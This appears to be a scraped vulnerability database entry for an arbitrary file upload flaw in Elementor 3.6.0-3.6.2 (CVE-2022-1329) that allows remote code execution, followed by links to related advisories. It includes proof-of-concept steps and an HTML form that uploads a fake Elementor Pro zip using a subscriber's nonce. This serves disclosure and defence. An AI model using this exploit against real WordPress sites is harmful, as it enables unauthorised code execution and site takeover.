Lucene search
WpvulndbWPEX-ID:DF62D170-C7D1-43A4-B6DC-20512934C33EHistoryApr 13, 2022 - 12:00 a.m.
Elementor 3.6.0-3.6.2 - Subscriber+ Arbitrary File Upload
2022-04-1300:00:00
wpvulndb
138
0.96 High
EPSS
Percentile
99.5%
The plugin is lacking capability check in a function hooked to admin_init introduced in v3.6.0, and only relying on a CSRF check. As the nonce is available to any authenticated users, they could call it and upload a malicious zip archive containing arbitrary files via a subsequent call, leading to RCE
To get the nonce, login as any user (such as subscriber) and check the source for elementorCommonConfig. The file to upload should be a fake Elementor Pro plugin zip
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" enctype="multipart/form-data" method="POST">
<input type="text" name="_nonce" value="nonce retrieved from source (check elementorCommonConfig) of the dashboard when logged in as any user">
<input type="file" name="fileToUpload">
<input type="hidden" name="action" value="elementor_upload_and_install_pro">
<input type="submit" value="Submit">
</form>
</body>Related
wordfence
wordfence
Critical Remote Code Execution Vulnerability in Elementor
2022-04-13 16:36:19
wpvulndb
wpvulndb
Elementor 3.6.0-3.6.2 - Subscriber+ Arbitrary File Upload
2022-04-13 00:00:00
githubexploit
githubexploit
patchstack
patchstack
openvas
openvas
WordPress Elementor Page Builder Plugin 3.6.0 - 3.6.2 RCE Vulnerability
2022-07-01 00:00:00
cvelist
cvelist
zdt
zdt
WordPress Elementor 3.6.2 Shell Upload Exploit
2022-10-05 00:00:00
WordPress Elementor 3.6.2 Remote Code Execution Vulnerability
2022-04-14 00:00:00
packetstorm
packetstorm
WordPress Elementor 3.6.2 Shell Upload
2022-10-04 00:00:00
cve
cve
CVE-2022-1329
2022-04-19 21:15:13
prion
prion
Remote code execution
2022-04-19 21:15:00
nuclei
nuclei
Elementor Website Builder - Remote Code Execution
2023-03-18 22:07:09
nvd
nvd
CVE-2022-1329
2022-04-19 21:15:13
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2022-10-07 19:07:40